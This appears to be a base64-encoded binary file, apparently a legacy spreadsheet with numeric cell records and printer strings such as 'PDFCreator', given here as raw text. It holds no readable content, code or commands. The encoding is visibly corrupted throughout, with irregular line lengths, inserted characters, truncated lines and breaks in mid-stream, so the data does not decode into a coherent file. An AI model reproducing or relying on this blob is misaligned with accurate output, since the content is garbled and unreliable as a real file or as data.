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
AACAAAgAAAAAAAAAAAA1AgQAAAD/AIEAAgDBBBQABQACAAAmQRUACgAHAABQ
YWd1ICZQgwACAAAAhAACAAAATQA6BAAAUABEAEYAQwByAGUAYQB0AG8AcgAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEE
AAbcAFwDU++AAQEACQDqCCm8IZAABAA8AWAICAAEAWAIDAAEATAB1AHQAdAB1
AHIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAABAAAAgAAAAEAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAFBSSVbiMAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAYAAAAAAQJxAnECcAABAnAAAAAAAAAACIAFwD
AAAAAAAAAABAAAAAAAAAAAAwAAAAAAAAAAAwAAAAAAAABAAUDQDACiIBAAA
AAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAA57FLTAMAAAAFAAoA/wAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAEAAAAAAAAAAAAAAAAACIAAAAU01USgAAAAQAHgAAAAAAAA
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
AAAAAAAAAAACAAM

DwAAkLpABgAbABUABAAPAAAAAAAAAAAACAAVAAX/BQABDAAEAAYAGwAVAAUA
DwAAAAAAAJC6QAgAFAAE/wUAAQwABQAGABsAFQAGAA8AAAAAAAAAAAAAAIABYA
Bv8FAAESAAYAfgIKABYAAAAPAAAA8D9+AgoAFgACAA8AJC6QAYAGwAWAAQA
DwAAAAAAAAAAAAgAFgAF/wUAAQwABAAGABsAFgAFAFAA8AAAAAACQukAIABUA
BP8FAAEMAAUABgAbABYABgAPAAAAAAAAAAAACAAXAAb/BQABEgAGAH4CCgAX
AAAADwAAAPA/fgIKABcAAgAPAACQukAGABsAFwAEAEAA8AAAAAAAAAAAAIABcA
Bf8FAAEMAAQABgAbABcABQAPAAAAAAAAkLpACAAWAAT/BQABDAAFAAYAGwAX
AAYADwAAAAAAAAAAAAgAGAAG/wUAARIABgB+AgoAGAAAAA8AAADwP34CCgAY
AAIADwAAkLpABgAbABgABAAPAAAAAAAAAAAACAAXAAT/BQABDAAEAAYAGwAY
AAUADwAAAAAAAJC6QAgAGQAF/wUAAQwABQAGABsAGAAGAPAAAAAAAAACQukAI
ABkABv8FAAESAAYAfgIKABkAAAAPAAAA8D9+AgoAGQACAA8AJC6QAYAGwAZ
AAQADwAAAAAAAAAAAAgAGQAE/wUAAQwABAAGABsAGAGAA8AAAAAAACQukAI
ABoABf8FAAEMAAUABgAbABkABgAPAAAAAAAAAAACAAaAAb/BQABEgAGAH4C
CgAaAAAADwAAAPA/fgIKABoAAgAPAACQukAGABsAGgAEAA8AAAAAAAAAAAAI
ABkABP8FAAEMAAQABgAbABoABQAPAAAAAAAAkLpACAAaAAT/BQABDAAFAAYA
CgAbAAIADwAAjbVABgAbABsABAAPAAAAAAAAAAACAAbAAb/BQABDAAEAAYA
GwAbAAUADwCamZmZmT2xQAgAGwAE/wUAAQwABQAGABsAGwAGAA8AAAAAAAA
AAAIABIABv8FAAESAAYAfgIKABwAAAAPAAAEAVEB+AgoAHAACAA8AAIa1QAYA
GwAcAAQADwAAAAAAAAAAAAAgAHQAE/wUAAQwABAAGABsAHAAFAA8AAAAAAAA4
sUAIABsABf8FAAEMAAUABgAbAwBgAPAAAAAAAAAAAACAAdAAb/BQABEgAG
AH4CCgAdAAAADwABAFRAfgIKAB0AAgAPAAABtUAGABsAHQAEAA8AAAAAAAAA
AAAIAB4ABP8FAAEMAAQABgAbAB0ABQAPAAAAAAAAkLpACAAdAAT/BQABDAAF
AAYAGwAdAAYADwAAAAAAAAAAAAgAHgAG/wUAARIABgB+AgoAHgAAAA8AAADw
P34CCgAeAAIADwAAwLJABgAbAB4ABAAPAAAAAAAAAAAACAAfAAT/BQABDAAE
AAYAGwAeAAUADwAAAAAAAMCyQAgAHQAF/wUAAQwABQAGABsAHgAGAA8AAAAA
AAAAAAIAB8ABv8FAAESAAYAfgIKAB8AAAAPAAAA8D9+AgoAHwACAA8AAAaLiy
QAYAGwAfAAQADwAAAAAAAAAAAAgAHwAF/wUAAQwABAAGABsAHwAFAA8AAAAA
AAC4skAIAB4ABf8F8FAAEMAAUABgAbAB8BAgAPAAAAAAAAAAAACAACAAT/BQAB
EgAGANcAQgDWEQAAAWAJUAJgApQB5AHkAeQB5AHkAeQB5AKoAxAB5AHkAeQB5
AIEAkgB5AHkAeQB5AHkAeQB5AHkAeQB5AHkAeQAIAhAAIAAAACA/wAAAAAA
AAEPAAgCEAAiAAABwD/AAAAAAAQ8ACAIQACMAAAAHAP8AAAAAAABBDwAI
AhAAJAAAAAcA/wAAAAAAEPAAgCEAAl1AAAABwD/AAAAAAAAQ8ACAIQACACY/
AAAHAP8AAAAAAABDwAIAhAAJwAAAABBDwAIAhAAIAAAQ8ACAIQACkAAAAHAP8
AAAAAAAAQ8ACAIQACAAAAAHAP8AAAAAAEPAAgCEAArAAAABwD/AAAAAAAAQ8ACAI
AhAALQAAAAcA/wAAAAAAEPAAgCEAAuAAAAAoA/wAAAAAAEPAACEEAAxAAAACgD/
AAAAAAAAQ8ACAIQADACkAAAAHAP8AAAAAAABDwAIAhAAJgAAAAcA/wAAAAAA
AAEPAAgCEArAAAABwD/AAAAAAAAQ8ACAIQAD0AAAACgD/AAAAAAAAQ8ACAIQADUDUAAAAKAP8AAAAAAAABDwAI
AhAANwAAAoA/wAAAAAAEPAAgCEAA4AAAACgD/AAAAAAAAQ8ACAIQAD6AAAAAcA
AAKAP8AAAAAAAAQ8ACAIQADkAAAACgD/AAAAAAAAQ8ACAIQACEAA4AAAAACgD/
AAAAAAAAQ8ACAIQAEAAACgD/AAAAAAAABDwAIAhAAOgAAAACgD/AAAAAAAAQ8ACAIQADsAAAAAcA
AAKAP8AAAAAAAAQ8ACAIQAOEAAACgD/AAAAAAAAQ8ACAIQAD9
AAoAIAAAAA8AbAAAAAYAGwAgAAEAlAAAAAAAAAAAAgAHAAG/wUAASAAAQC8
BBcAIAAgAAEGAAEGAAYNAC3s////AMAAwBkQd40GABsAIAACACwAAAAAAPBp/EAI
ACAAAAf8FAAEgAAEABgAbACAAAwAsAAAAAAmJdACAAgAAL/BQABIAAB
GwAgAAQALAAAAAAAAAAAgAIAAD/wUAASAAAQAGABsAIAAFACwCWANDMzM+Oc
+0AIACAABP8FAAEgAAEABgAbACAABgAsAAAAAAAAmJdACAAgAAX/BQABIAAB
AH4CCgAiAAAADwABAFRAfgIKACIAAgAPAAAsukAGABsAIgAEAA8AAAAAAAAAAA
AAAIACAABv8FAAEiAAQAvAQVCAIANAAEBAATCwBMAAD9wEwAAPzABQYYAGwAi
AAUADwAAAAAAAPC0QAgAIgAE/wUAASABQC8BBUAIAAgAAAUFABMLAEAAAAAAAAA
TAAA/cAFBgBgAbACIABgAPAAAAAAAAAACAAiAAX/BQABIgAGAGAL8FAAEiAAQA
BgYYAGwAiAAcADwAAAAAAAAAAAACAAiAAr/BQABIAAABWs0AGABsAJQAEAA8AAAAAAAAAAAgABQABJYP8FAAEiAAEAQABgAb
ACUAAgAPAAPAAAAAAAAAAACAAiAAX/BQABIgAGAIgEAAAAAAAAAAAIACYABP8FAAEiAAEAAQABgAb
ACUUAgAPAABWs0AGABsAJQAEAA8AAAAAAAAAAACAICYABP8FAAEiAAEAAQABgAb

ACUABQAPAAAAAAAAVrNACAAmAAX/BQABIgAFAAYAGwAlAAYADwAAAAAAAAAA
AAgAJgAG/wUAASIABgB+AgoAJgAAAA8AAADwP34CCgAmAAIADwAAVrNABgAb
ACYABAAPAAAAAAAAAAAACAAnAAT/BQABIgAEAAYAGwAmAAUADwAAAAAAAFaz
QAgAJwAF/wUAASIABQABAgAEAAGAA8AAAAAAAAAAAAIACsABv8FAAEiAAYA
fgIKACsAAAAPAAAA8D9+AgoAJwACAA8AAFAzQAYAGwAnAAQADwAAAAAAAAAA
AAgAKAAE/wUAASIAABAAGABsAJwAFAAEAAAAAAABWs0AIACgAB8FAAEiAAUA
BgAbACsABgAPAAAAAAAAAAAACAAoAAb/BQABIgAGAH4CCgAoAAAADwABAAFRA
fgIKACsAAgAPAAAAKtEAGABsAKAAEAA8AAAAAAAAAAAIACkABP8FAAEiAAQA
BgAbACgABQAPAAAAAAAACLBACAApAAX/BQABIgAFAAYAGwAoAAYADwAAAAAA
AAAAAAgAKQAG/wUAASIABgB+AgoAKQAAAA8AAACAADwAACrRA
BgAbACkABAAPAAAAAAAAAAAACAAqAAT/BQABIgAEAAYAGwApAAUADwAAAAAA
AAiwQAgAKQAF/wUAASIABQABAgAEAAGAA8AAAAAAAAAAAIACoABv8FAAEi
AAYAfgIKACoAAAAPAAEAEVB+AgoAKgAAAAq0QAYAGwAqAAQADwAAAAAAAAAA
AAAAAAgAKwAE/wUAASIABAAGABsAKgAFAAEAAAAAAAAAAAAIsEAIACsABf8FAAEi
AAUABgAbACoABgAPAAAAAAAAAAAACAArAAb/BQABIgAGAH4CCgArAAAADwAA
APA/fgIKACsAAgAPAAAAEtUAGABsAKwAEAA8AAAAAAAAAAAAIACwABP8FAAEi
AAQABgAbACsABQAPAAAAAAAABLVACAAsAAX/BQABIgAFAAYAGwArAAYADwAA
AAAAAAAAAAgALAAG/wUAASIABgB+AgoALAAAAA8AAADwP34CCgAsAAIADwAA
BLVABgAbACwABAAPAAAAAAAAAAAACAAtAAT/BQABIgAEAAYAGwAsAAUADwAA
AAAAAAS1QAgALQAF/wUAASIABQABAgAEAAGAA8AAAAAAAAAAAIAC0ABv8F
